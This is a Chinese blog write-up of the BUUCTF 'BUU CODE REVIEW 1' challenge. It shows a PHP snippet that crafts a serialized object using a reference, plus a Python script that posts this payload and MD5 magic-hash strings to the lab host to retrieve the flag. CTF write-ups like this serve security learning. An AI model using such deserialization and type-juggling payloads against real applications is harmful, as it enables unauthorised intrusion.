BUU CODE REVIEW 11反序列化

反序列化漏洞

进入靶机是这个样子

首先进行分析后

看最后一行那个函数unserialize,判断反序列化

 


 然后用post方法传obj变量,利用反序列化漏洞
这里要进行一个判断,就是buu类中的correct和input内容强相等,这里利用传引用的方法

 到http://c.runoob.com/compile/1运行下列代码

<?php
class BUU {
	public $correct="";
	public $input="";
}
$obj = new BUU();
$obj->input = $obj->correct;
echo serialize($obj);
?>

 编写脚本:

import requests

with requests.post(url="http://c934396b-xxxx-xxxx-xxxx-62bbeee14c98.node3.buuoj.cn/?pleaseget=1",
                   data={
                       "pleasepost": "2",
                       "md51": "QNKCDZO",
                       "md52": "240610708",
                       "obj": """O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}"""
                   }
                   ) as req:
    print(req.text)
    with open("BUU CODE REVIEW 1.html", "w", encoding=req.apparent_encoding) as f:
        f.write(req.text)

 python运行:

 提交flag

 或者直接用Firefox自带的工具HackBar运行也可以

  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值